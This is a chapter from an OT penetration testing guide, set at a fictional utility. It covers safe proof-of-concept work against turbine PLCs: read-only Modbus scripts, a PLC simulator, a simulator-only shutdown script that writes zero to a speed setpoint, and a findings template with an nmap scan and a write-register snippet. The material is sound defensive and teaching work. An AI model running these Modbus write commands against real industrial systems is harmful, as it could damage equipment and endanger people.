Proof of concept development¶
Showing what’s possible without actually doing it.
The Patrician has a saying about demonstrations of power: the most effective demonstration is the one you never quite have to perform. The credible threat of action is often more valuable than the action itself, particularly when the action in question might accidentally shut down half the city’s power supply or turn a water treatment plant into an unscheduled chemistry experiment.
Proof of concept development in OT penetration testing is the art of proving we could do something catastrophic without actually doing it.
This is rather more important in OT than in IT. In IT penetration testing, we might actually exfiltrate data (with permission) or actually compromise systems (in a controlled way) to prove impact. In OT, “actually demonstrating” that we can shut down the turbines by shutting down the turbines is the sort of thing that gets people hurt, gets us arrested, and gets the entire concept of security testing banned from the facility for the next decade.
The challenge is demonstrating sufficient proof that stakeholders take the findings seriously, without demonstrating so much proof that we cause actual harm. It’s a delicate balance, like explaining to the Archchancellor that his experimental thaumic reactor has a critical flaw without actually causing it to explode. We need to be convincing enough that he’ll fund the repairs, but not so convincing that we have created a smoking crater where the University used to be.
Understanding safe exploitation boundaries¶
Before writing a single line of exploit code, establish what we are allowed to do and what we are absolutely not allowed to do. These boundaries should be documented, signed off by people with authority, and reviewed by people who understand the actual physical processes involved.
Safe boundaries typically include things like reading data from systems, connecting to services, analysing network traffic, and testing authentication mechanisms against non-production systems. Unsafe boundaries typically include things like writing data to production PLCs, stopping running processes, modifying setpoints, or basically anything that could cause a safety system to activate or a production process to fail.
At UU P&L, our initial rules of engagement said we could “test all systems for vulnerabilities but should avoid disrupting operations”. This was fine in theory but useless in practice because it didn’t specify what “disrupting” meant. Was reading holding registers from a PLC disruptive? What about reading them repeatedly? What about reading them whilst the PLC was also controlling an active chemical process? We needed rather more specific boundaries.
Establish clear operational boundaries¶
Work with operations and engineering to define specifically what’s safe:
Which systems are production versus test?
Which operations are read-only versus write?
Which times are acceptable for testing?
Which physical processes must not be affected?
What happens if something goes wrong anyway?
Document these in the rules of engagement and reference them before every test. “The RoE says this is safe” is much better legal protection than “I thought it would probably be fine”.
Create a safety classification system¶
Not all tests carry equal risk. Classifying our tests:
Green (Safe):
Reading public data
Passive network observation
Testing against simulators
Credential testing on isolated systems
Static analysis of code or configurations
Amber (Proceed with caution):
Reading data from production PLCs
Active scanning of production networks
Testing authentication on production systems
Protocol fuzzing against simulators
Analysing safety system configurations
Red (Requires explicit approval each time):
Any write operations to production systems
Any testing that could trigger alarms
Any testing during critical operations
Testing safety systems
Any testing that requires bypassing safety controls
At UU P&L, we classified “reading the current turbine speed” as green, “reading the turbine speed setpoint” as amber (because it revealed operational information), and “writing a new turbine speed setpoint” as red (because it could actually change physical operations). Before any red test, we had to get explicit approval from operations, confirm that the process was in a safe state, and have someone standing by who could intervene physically if needed.
Read-only demonstrations¶
The safest form of proof of concept is demonstrating what we can read rather than what we can change. If we can read process values, configurations, and control parameters, we can often prove impact without actually modifying anything.
Demonstrate data access¶
Reading data from an OT system can demonstrate several impacts:
Intellectual property theft (process parameters, recipes, configurations)
Competitive intelligence (production rates, efficiency metrics)
Pre-attack reconnaissance (system states, normal baselines)
Safety information leakage (alarm thresholds, safety limits)
Create a proof of concept that reads and displays sensitive information:
#!/usr/bin/env python3
"""
Proof of concept: Unauthorised reading of turbine control parameters
This demonstrates that an attacker could read sensitive operational data
including setpoints, alarms, and safety limits from the turbine PLCs.
NOTE: This is a READ-ONLY demonstration. No values are modified.
"""
from pymodbus.client import ModbusTcpClient
import json
from datetime import datetime
def read_turbine_config(plc_ip, unit_id=1):
"""Read turbine configuration without modifying anything"""
client = ModbusTcpClient(plc_ip, port=502)
client.connect()
# Read holding registers (read-only operation)
# Addresses determined during reconnaissance phase
config = {}
# Speed setpoint (register 1000)
result = client.read_holding_registers(1000, 1, slave=unit_id)
if not result.isError():
config['speed_setpoint_rpm'] = result.registers[0]
# Temperature alarm threshold (register 1050)
result = client.read_holding_registers(1050, 1, slave=unit_id)
if not result.isError():
config['temp_alarm_threshold_c'] = result.registers[0]
# Emergency stop status (register 1100)
result = client.read_holding_registers(1100, 1, slave=unit_id)
if not result.isError():
config['emergency_stop_active'] = bool(result.registers[0])
client.close()
return config
def demonstrate_impact():
"""Show what an attacker could learn from this access"""
print("[*] Proof of Concept: Unauthorised Turbine Configuration Access")
print("[*] This is a READ-ONLY demonstration\n")
# Read from multiple turbines
turbines = [
('192.168.10.10', 'Turbine 1'),
('192.168.10.11', 'Turbine 2'),
('192.168.10.12', 'Turbine 3')
]
results = {}
for ip, name in turbines:
print(f"[*] Reading configuration from {name} ({ip})...")
config = read_turbine_config(ip)
results[name] = config
print(f" Speed Setpoint: {config['speed_setpoint_rpm']} RPM")
print(f" Temperature Alarm: {config['temp_alarm_threshold_c']}°C")
print(f" E-Stop Active: {config['emergency_stop_active']}\n")
# Save results with timestamp
output = {
'timestamp': datetime.now().isoformat(),
'demonstration': 'read_only_turbine_access',
'turbines': results,
'impact_notes': [
'Attacker could monitor operational states in real-time',
'Configuration data reveals safety margins and operational limits',
'Historical data collection could reveal production schedules',
'Information could be used to plan precise manipulation attacks'
]
}
with open('poc_turbine_read.json', 'w') as f:
json.dump(output, f, indent=2)
print("[*] Results saved to poc_turbine_read.json")
print("[*] No modifications were made to any systems")
if __name__ == '__main__':
demonstrate_impact()
This proof of concept demonstrates that we can access sensitive operational data, but it never writes anything. We can show stakeholders the output and explain that if we can read these values, a malicious actor could also read them, and could use that information to understand the system before planning an attack.
Demonstrate configuration analysis¶
If we have extracted configurations (ladder logic, HMI projects, SCADA configurations), we could analyse them to show what an attacker could learn:
#!/usr/bin/env python3
"""
Analyse extracted PLC ladder logic to identify security issues
Demonstrates what an attacker learns from configuration access
"""
def analyse_ladder_logic(logic_file):
"""
Parse ladder logic to identify security-relevant information
This is simplified; real ladder logic analysis is more complex
"""
findings = {
'safety_critical_rungs': [],
'hardcoded_credentials': [],
'undocumented_functions': [],
'alarm_thresholds': [],
'network_connections': []
}
# This would actually parse the ladder logic
# For PoC, we're showing what you'd find
findings['safety_critical_rungs'] = [
{
'rung': 127,
'description': 'Emergency shutdown logic',
'condition': 'Temperature > 95C OR Pressure > 150 PSI',
'action': 'Close inlet valve, stop pump'
}
]
findings['hardcoded_credentials'] = [
{
'location': 'Rung 445',
'credential': 'FTP connection to 192.168.20.10',
'username': 'admin',
'password_hash': 'MD5:5f4dcc3b5aa765d61d8327deb882cf99'
}
]
findings['alarm_thresholds'] = [
{'parameter': 'Temperature', 'warning': 85, 'critical': 95, 'unit': 'C'},
{'parameter': 'Pressure', 'warning': 130, 'critical': 150, 'unit': 'PSI'}
]
return findings
def demonstrate_configuration_analysis():
"""Show impact of configuration access"""
print("[*] Proof of Concept: Ladder Logic Analysis")
print("[*] Demonstrating information available from extracted configurations\n")
findings = analyse_ladder_logic('turbine_plc.l5k')
print("[*] SAFETY-CRITICAL LOGIC DISCOVERED:")
for item in findings['safety_critical_rungs']:
print(f"\n Rung {item['rung']}: {item['description']}")
print(f" Condition: {item['condition']}")
print(f" Action: {item['action']}")
print("\n IMPACT: Attacker knows exact conditions that trigger safety systems")
print(" Could craft attacks that stay just below these thresholds")
print("\n[*] HARDCODED CREDENTIALS FOUND:")
for item in findings['hardcoded_credentials']:
print(f"\n Location: {item['location']}")
print(f" {item['username']}:{item['password_hash']}")
print(" IMPACT: Credentials could be cracked offline, used for lateral movement")
print("\n[*] ALARM THRESHOLDS DISCOVERED:")
for item in findings['alarm_thresholds']:
print(f" {item['parameter']}: Warning={item['warning']}, Critical={item['critical']} {item['unit']}")
print(" IMPACT: Attacker knows exactly when alarms trigger")
print(" Could manipulate values to stay below alarm thresholds")
if __name__ == '__main__':
demonstrate_configuration_analysis()
Simulation environments¶
The most convincing proof of concept is one that actually works, just not against production systems. Build a simulation environment that mirrors the production environment closely enough to demonstrate attacks, but safely enough that nothing real breaks.
Hardware simulation¶
If we have access to spare PLCs or other OT devices, build a test rig:
Test Environment:
Same model PLC as production
Same firmware version
Same ladder logic (or simplified version)
Connected to HMI simulator or test HMI
No physical process connected
At UU P&L, we borrowed a decommissioned Turbine PLC, loaded it with a copy of the production ladder logic, and connected it to a HMI running on a laptop. We could then demonstrate attacks against the real hardware without any risk to actual turbines.
Software simulation¶
If hardware is not available, software simulators can demonstrate many attacks:
#!/usr/bin/env python3
"""
Simple Modbus PLC simulator for demonstrating attacks
This mimics the behaviour of the UU P&L turbine PLCs
"""
from pymodbus.server import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSlaveContext, ModbusServerContext
def create_turbine_simulator():
"""Create a simulated turbine PLC"""
# Initialize data blocks
# Coils (digital outputs)
coils = ModbusSequentialDataBlock(0, [0]*1000)
# Discrete inputs (digital inputs)
discrete_inputs = ModbusSequentialDataBlock(0, [0]*1000)
# Holding registers (analog outputs, setpoints)
# Initialize with "normal" operational values
holding_registers = ModbusSequentialDataBlock(0, [0]*1000)
holding_registers.setValues(1000, [1500]) # Speed setpoint: 1500 RPM
holding_registers.setValues(1050, [95]) # Temp alarm: 95°C
holding_registers.setValues(1100, [0]) # E-stop: not active
# Input registers (analog inputs, measurements)
input_registers = ModbusSequentialDataBlock(0, [0]*1000)
input_registers.setValues(2000, [1498]) # Current speed: 1498 RPM
input_registers.setValues(2050, [72]) # Current temp: 72°C
# Create the slave context
store = ModbusSlaveContext(
di=discrete_inputs,
co=coils,
hr=holding_registers,
ir=input_registers
)
context = ModbusServerContext(slaves=store, single=True)
# Device identification
identity = ModbusDeviceIdentification()
identity.VendorName = 'UU P&L'
identity.ProductCode = 'TURBINE-PLC'
identity.VendorUrl = 'http://uu.edu'
identity.ProductName = 'Turbine Controller'
identity.ModelName = 'TC-1500'
identity.MajorMinorRevision = '2.3.1'
return context, identity
if __name__ == '__main__':
context, identity = create_turbine_simulator()
print("[*] Starting UU P&L Turbine PLC Simulator")
print("[*] Listening on 0.0.0.0:502")
print("[*] This simulator mimics production PLC behaviour")
print("[*] Safe for testing attacks without impacting real systems\n")
StartTcpServer(context=context, identity=identity, address=("0.0.0.0", 502))
We can then run attacks against this simulator and record the results:
#!/usr/bin/env python3
"""
Demonstrate turbine shutdown attack against simulator
"""
from pymodbus.client import ModbusTcpClient
import time
def demonstrate_shutdown_attack(simulator_ip):
"""
Proof of concept: Turbine emergency shutdown via Modbus
Running against SIMULATOR ONLY
"""
print("[*] Proof of Concept: Unauthorised Turbine Shutdown")
print(f"[*] Target: SIMULATOR at {simulator_ip}")
print("[*] This demonstrates what an attacker could do to production systems\n")
client = ModbusTcpClient(simulator_ip, port=502)
client.connect()
# Read current state
print("[*] Reading current turbine state...")
speed = client.read_input_registers(2000, 1, slave=1)
print(f" Current speed: {speed.registers[0]} RPM")
setpoint = client.read_holding_registers(1000, 1, slave=1)
print(f" Current setpoint: {setpoint.registers[0]} RPM\n")
# Demonstrate attack
print("[*] Executing attack: Writing zero to speed setpoint register...")
result = client.write_register(1000, 0, slave=1)
if not result.isError():
print("[✓] Write successful")
print("\n[*] In production, this would cause:")
print(" 1. Turbine to begin emergency deceleration")
print(" 2. Possible activation of safety systems")
print(" 3. Loss of power generation")
print(" 4. Potential damage to turbine from rapid speed change")
print("\n[*] Attack successful against simulator")
print("[*] In production, this would require immediate operator intervention")
else:
print("[✗] Write failed")
# Verify change
time.sleep(1)
new_setpoint = client.read_holding_registers(1000, 1, slave=1)
print(f"\n[*] Verified: New setpoint is {new_setpoint.registers[0]} RPM")
client.close()
if __name__ == '__main__':
# ALWAYS AGAINST SIMULATOR
demonstrate_shutdown_attack('127.0.0.1')
Video proof of concepts¶
When we can not safely perform an attack against real systems, record a video of the attack against a simulator. This provides visual evidence that is more compelling than just a written description, without the risks of testing production systems.
Create professional demonstrations¶
A good PoC video should:
Clearly identify that it’s a simulation
Show the initial system state
Execute the attack with explanation
Show the resulting system state
Explain the production impact
Recording structure¶
[Opening screen]
"Proof of Concept: Unauthorised Turbine Control"
"Demonstration against SIMULATOR ONLY"
"UU P&L Penetration Test - December 2024"
[Screen 1: Network diagram]
Show the attack path from entry point to target
Highlight each step of lateral movement
"This demonstrates the attack path available in production"
[Screen 2: Normal operations]
Show HMI displaying normal turbine operation
Speed: 1500 RPM, Temperature: 72°C
"Current production state: Normal operations"
[Screen 3: Attack execution]
Terminal window showing the attack script
Execute the script step-by-step with commentary
Show each Modbus command and response
[Screen 4: Impact]
Show HMI displaying changed values
Speed setpoint now 0 RPM
Alarm indicators activating
"In production, this would cause emergency shutdown"
[Screen 5: Impact explanation]
Text overlay explaining consequences:
- Production loss
- Equipment stress
- Safety system activation
- Recovery time required
[Closing screen]
"This vulnerability exists in production"
"No authentication required for Modbus commands"
"Recommendation: Implement authentication and network segmentation"
At UU P&L, we created a video showing the entire attack chain from initial access to final impact. We started with a screen recording of connecting to the guest Wi-Fi, showed the pivot to the contractor laptop, demonstrated the lateral movement to the engineering workstation, and finally showed the connection to the PLC simulator and the execution of the attack. The video ran for eight minutes and was far more convincing than any written report could have been.
Documentation of theoretical impacts¶
When we can’t demonstrate an attack even in simulation (perhaps because we don’t have access to the specific hardware or the attack would require physical presence we haven’t been granted), document the theoretical impact with sufficient detail that stakeholders understand the risk.
Structure theoretical impact documentation¶
# Vulnerability: Unauthenticated Modbus Access to Turbine PLCs
## Technical Details
Affected Systems:
- Turbine PLCs: 192.168.10.10-12
- Manufacturer: Allen-Bradley
- Model: ControlLogix 5500
- Firmware: 20.11
Vulnerability:
Modbus TCP service (port 502) accessible from engineering network with no authentication required.
## Attack Prerequisites
Required Access:
- Network connectivity to 192.168.10.0/24
- Available via engineering workstation network (see vulnerability V-042)
Required Skills:
- Basic Modbus protocol knowledge
- Available tools: pymodbus, mbtget, any Modbus client
Required Time:
- < 5 minutes to identify vulnerable PLCs
- < 1 minute to execute commands
## Attack Scenario
1. Attacker gains access to engineering network
2. Scans for Modbus services: `nmap -p 502 192.168.10.0/24`
3. Identifies turbine PLCs responding on port 502
4. Reads current configuration to understand register mapping
5. Writes malicious values to control registers
Example Attack Command:
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.10.10')
client.connect()
# Write zero to speed setpoint (emergency stop)
client.write_register(1000, 0, slave=1)
## Impact analysis
### Immediate physical impact
Turbine Shutdown:
- Writing 0 to speed setpoint register causes immediate deceleration
- Turbine designed for controlled shutdown over 5-minute period
- Immediate shutdown causes mechanical stress
Safety System Response:
- Emergency stop systems would activate
- Backup generator would engage (30-second delay)
- Critical loads would experience brief power loss
### Operational impact
Production loss:
- Each turbine generates 15MW
- Current electricity price: €85/MWh
- Loss per turbine per hour: €1,275
- Three turbines down: €3,825/hour
Recovery time:
- Turbine restart procedure: 2 hours minimum
- Safety system reset: 30 minutes
- System checks required: 1 hour
- Total downtime: ~3.5 hours minimum
Financial impact (single attack):
- Production loss: €13,387.50
- Maintenance inspection: €5,000 (stress damage check)
- Emergency response: €2,000
- Total: ~€20,400
### Safety Impact
Potential Risks:
- Sudden speed change increases bearing stress
- Repeated attacks could cause premature bearing failure
- Bearing failure on rotating machinery is a serious safety risk
- Personnel typically present in turbine hall during operations
Mitigation (Current):
- Physical emergency stops available
- Operators can manually override PLC commands
- Safety systems independent of Modbus control
Risk Level:
Medium: Attack would be noticed quickly, operators can intervene, but repeated attacks could cause cumulative damage
### Worst-Case Scenario
If an attacker modified turbine parameters subtly rather than shutting down completely:
- Gradual overspeed (e.g., 1510 RPM instead of 1500)
- Below alarm threshold (1550 RPM)
- Causes accelerated wear
- Could lead to catastrophic failure weeks later
- Failure of spinning turbine could send shrapnel through turbine hall
This worst-case scenario has much higher safety risk but would be harder to detect
### Evidence
Network Access Confirmed:
- Successfully connected to 192.168.10.10:502 from engineering workstation
- Modbus service responded to query commands
- Successfully read holding registers (read-only test)
Attack Feasibility:
- PoC script developed and tested against simulator
- Simulator exhibited expected behaviour (speed changed as commanded)
- No technical barriers to production attack
- Only ethical constraints prevented production test
### Recommendations
Immediate (< 1 week):
1. Implement network ACLs to restrict Modbus access
2. Monitor Modbus traffic for unexpected write commands
3. Document baseline of legitimate Modbus operations
Short-term (< 1 month):
1. Deploy Modbus firewall with write command filtering
2. Implement role-based access for Modbus operations
3. Add alerting for write operations to critical registers
Long-term (< 6 months):
1. Migrate to authenticated protocol (Modbus/TCP Security)
2. Implement proper network segmentation (separate control VLANs)
3. Deploy IDS with OT protocol awareness
## References
- CVE-2015-6574: Modbus lacks authentication (by design)
- ICS-CERT Advisory ICSA-19-211-01: Modbus vulnerabilities
- ISA/IEC 62443: Industrial network security standards
This level of documentation provides enough detail that stakeholders can understand the risk even without seeing a live demonstration. We have explained what is possible, why it is possible, what the impact would be, and what can be done about it.
Responsible disclosure considerations¶
If we discover vulnerabilities in commercial products during our testing, we have ethical obligations beyond just reporting to our client.
Vendor notification¶
If the vulnerability is in a product used by other organisations:
Notify the vendor first (before public disclosure)
Provide sufficient detail that they can reproduce
Allow reasonable time for patching (typically 90 days)
Coordinate disclosure with vendor
ICS-CERT coordination¶
For critical infrastructure vulnerabilities, notify the authority:
They can coordinate with vendors
They can issue advisories to other users
They can help with responsible disclosure timeline
Client notification boundaries¶
Our client needs to know about the vulnerabilities we found, but we should:
Not provide full exploit code unless necessary
Consider whether the report might be shared
Redact sensitive details if report will be widely distributed
Ensure exploits are not trivially weaponisable from report alone
At UU P&L, we discovered a zero-day vulnerability in a popular industrial firewall. The vulnerability allowed authentication bypass via a crafted HTTP request. We:
Notified the vendor immediately with proof of concept
Notified ICS-CERT with coordination details
Provided our client with detailed mitigation steps
Did not include full exploit code in the written report
Agreed on 90-day disclosure timeline with vendor
Published advisory after patch was available
The vendor patched within 45 days, we publicly disclosed at 90 days, and UU P&L received recognition for responsible disclosure. Everyone wins, except attackers who had a slightly smaller attack surface to work with.
The balance of proof and safety¶
The fundamental tension in OT penetration testing proof-of-concept development is this: we need to prove that something dangerous is possible without actually doing the dangerous thing. It’s like proving we could rob a bank by showing the vault’s blueprints, demonstrating that we can pick the lock on a replica, and explaining our exit strategy, all without actually taking any money from the actual bank.
This requires more creativity than IT penetration testing, where “proof” often means “I actually did it and here’s the data I exfiltrated”. In OT, proof means “I could have done it and here’s everything that makes that claim credible short of actually doing it”.
The more evidence we can provide short of actually manipulating production systems, the better. Simulator attacks are better than theoretical descriptions. Videos are better than static screenshots. Detailed technical analysis is better than “trust me, this would work”. But never, ever cross the line into actually doing something that could cause harm, no matter how certain we are that it would be safe. The moment something goes wrong, “I was sure it would be fine” stops being a defence and becomes evidence of negligence.
Document everything we can safely demonstrate, explain clearly what we can’t safely demonstrate and why, and trust that if we have done our job properly, the stakeholders will understand the risk even without seeing production systems fall over. If they don’t believe us without a live demonstration, they’re not going to respond appropriately to the findings anyway, and demonstrating on production systems will not fix that particular organisational problem.